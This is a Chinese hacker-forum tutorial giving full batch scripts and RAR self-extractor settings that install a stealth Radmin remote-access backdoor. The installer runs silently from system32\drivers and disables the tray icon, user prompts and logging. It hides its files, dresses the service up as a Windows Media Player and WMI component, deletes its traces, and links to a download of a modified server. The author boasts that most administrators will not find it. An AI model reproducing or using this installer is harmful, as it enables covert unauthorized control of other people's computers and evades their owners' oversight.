我中意它没有办法  给大家说说我平时radmin服务端嘀配置

为了方便安装我们制作个rar自解你们应该会吧

我们建个bat文件内容如下:

net stop r_server

保存为1.bat文件作用:以防万

在建个bat内容如下:


@echo off
@system.exe /un /silence
@system.exe / /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>>

c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>>

c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo

"Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7>>

c:\server.reg
echo "Port"=hex:7a,00,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg>> c:\server.reg
@regedit /s c:\server.reg
@net start r_server
@attrib +r +h %systemroot%\system32\drivers\system.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>

c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他移动

媒体驱动和库提供基层安全协议服务">> c:\ip.reg

@regedit /s c:\ip.reg
@del c:\ip.reg /f /q
@del c:\server.reg /f /q

@sc config r_server displayname= "Windows Management Instrumentation

Player Drivers"
@del %systemroot%\system32\haha.exe /f /q
@del %systemroot%\system32\drivers\sc.exe /f /q
@del %systemroot%\system32\drivers\1.bat /f /q
@del %systemroot%\system32\drivers\2.bat /f /q

保存为2.bat文件 文件实际应用中注意:

1."Port"=hex:7a,00,00,00换成你radmin中reg文件中相应内容这个是

端口

2."Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7这个

是密码换成相应即可

3.其他默认大家应该知道了我没有使用注册表而是bat原因(1.我喜

欢bat嘿嘿)

4.配置RAR高级自解压缩选项嘀时候注意那个解压路径 写成%systemroot%

\system32\drivers这个  
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入2.bat
步骤3 在『解压前运行』输入1.bat
步骤4 选择RAR高级自解压缩中『模式』 改两个地方 选择『全部隐藏』和『

覆盖所有文件』

5.把你r_server改名成system

6.RAR打包时候不要忘记了SC这个

在上面我使用到了几个隐藏窍门技巧

1.使用了attrib命令

2.利用注册表中服务介绍说明就是下面这段
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>

c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他移动

媒体驱动和库提供基层安全协议服务">> c:\ip.reg

@regedit /s c:\ip.reg
@del c:\ip.reg /f /q

大家应该可以看懂

3.使用SC改变了r_server服务名

@sc config r_server displayname= "Windows Management Instrumentation

Player Drivers"

有了以上几步很多管理员都不会查出来当然普通人更不会了

大家选择个好端口就行了如果要替换服务自己加几个命令在

2.bat中就是了

优点:
1.在 系统服务 中看见是Windows Management Instrumentation Player

Drivers  服务  (可以自定义)
2.服务介绍说明是 提供加载进程及为其他移动媒体驱动和库提供基层安全

协议服务
3.在cmd下面  使用net start 看见自起动服务是Windows Management

Instrumentation Player Drivers
4.在进程中看见是system(可以自定义在2.bat文件中相应地方改下

注意不要和已有系统进程起冲突)

以上SC还有经过处理RAdmin服务端  

下载地址:http://superhan.ys168.com

有下载

      这个就是我使用有好给我提提意见(替换服务出外)

本文来源:中国X黑客小组[CnXHacker.Net]　　作者:韩枫

上篇文章: 浅析黑客常用 5大重量级武器

下篇文章: WINNTAutoAttack操作功能图文教程